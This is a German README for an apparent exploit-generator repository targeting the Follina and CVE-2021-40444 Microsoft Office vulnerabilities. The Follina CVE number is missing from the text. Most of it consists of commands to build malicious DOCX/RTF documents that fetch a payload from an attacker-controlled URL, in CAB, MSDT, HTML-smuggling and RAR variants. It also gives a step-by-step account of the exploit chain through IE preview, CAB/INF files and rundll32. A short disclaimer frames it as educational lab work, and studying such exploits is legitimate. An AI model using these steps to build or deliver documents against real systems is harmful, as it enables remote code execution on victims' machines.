Ausnutzung der Follina CVE- und CVE-2021-40444-Schwachstellen
Inhaltsverzeichnis
- Einführung
- Voraussetzungen
- Einrichtung und Installation
- Verwendung
- Detaillierte Erklärung
- Befehle
- Haftungsausschluss
Einführung
Dieses Repository enthält Skripte und Ressourcen zur Ausnutzung der Follina CVE- und CVE-2021-40444-Schwachstellen in Microsoft Office. Die Skripte generieren schädliche Dokumentdateien, die beliebigen Code auf dem Zielsystem ausführen können.
Voraussetzungen
- Flare VM
- Python 3.x
- Microsoft Word
- Erforderliche Python-Pakete (aufgelistet in
requirements.txt)
Einrichtung und Installation
-
Flare VM einrichten:
- Stellen Sie sicher, dass Flare VM installiert ist. Die Anmeldeinformationen für die VM sind:
- Benutzername:
lab
- Passwort:
password
-
Python und virtuelle Umgebung:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
- Stellen Sie sicher, dass Python und pip in der virtuellen Maschine installiert sind.
- Installieren Sie das Paket
virtualenv mit folgendem Befehl:
- Erstellen Sie eine virtuelle Umgebung namens
venv:
python -m virtualenv venv
- Aktivieren Sie die virtuelle Umgebung:
venv\Scripts\activate.bat
- Installieren Sie die erforderlichen Pakete:
pip install -r requirements.txt
Verwendung
-
Generieren des Exploits:
- Wechseln Sie in das Projektverzeichnis und führen Sie den folgenden Befehl aus, um den Exploit zu generieren:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
Ersetzen Sie 192.168.197.132 durch Ihre IP-Adresse.
-
Zugriff auf das generierte Dokument:
- Das generierte
.docx-Dokument befindet sich im Verzeichnis:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
Detaillierte Erklärung
Kettenausnutzung
- Das Dokument (
.docx) wird geöffnet.
- Das Dokument enthält eine Beziehung, die auf schädliches HTML in
document.xml.rels verweist.
- Der HTML-Link wird in der IE-Vorschau geöffnet.
- Ein Objekt verweist auf eine CAB-Datei und ein iframe, das auf eine INF-Datei verweist, die beide in JScript eingebettet und mit der Direktive ".cpl:" versehen sind.
- Die CAB-Datei wird geöffnet und speichert die INF-Datei im Verzeichnis
%TEMP%Low.
- Die INF-Datei wird mit der Direktive ".cpl:" geöffnet, wodurch
rundll32 die INF-Datei seitlich lädt.
Skriptübersicht
generator.py
- Implementiert einen Exploit für CVE-2021-40444, der die Remote-Code-Ausführung über Microsoft Office ermöglicht.
- Enthält verschiedene Hilfsfunktionen zum Patchen von CAB-Dateien, Erstellen von RAR-Dateien, Generieren von Payloads und mehr.
cab_parser.py
- Ein Tool zum Anzeigen von CAB-Datei-Headern.
- Definiert Klassen und Methoden zum Verarbeiten und Parsen von CAB-Dateien.
Abschnitt 2.0: Einrichtung in Flare VM
- Installieren Sie die erforderlichen Tools und Pakete.
- Erstellen und aktivieren Sie eine virtuelle Umgebung.
- Installieren Sie die Python-Pakete aus
requirements.txt.
Befehle
- Generieren Sie den ursprünglichen Exploit und testen Sie lokal:
python generator.py -u http://127.0.0.1 -P test\calc.dll --host
- Generieren Sie einen CAB-losen Exploit, der MS-MSDT (Follina-Angriff) nutzt, sowohl in DOCX- als auch in RTF-Dokumenten:
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
- Generieren Sie einen CAB-losen Exploit (nur IE) mit HTML-Schmuggel und testen Sie lokal über IE:
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
- Generieren Sie einen CAB-losen Exploit mit RAR und testen Sie lokal über IE:
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
Haftungsausschluss
Dieses Projekt dient nur zu Bildungszwecken. Nutzen Sie es verantwortungsbewusst und nutzen Sie Schwachstellen nicht auf Systemen aus, für die Sie keine Testberechtigung haben. Missbrauch dieser Informationen kann zu strafrechtlichen Konsequenzen führen.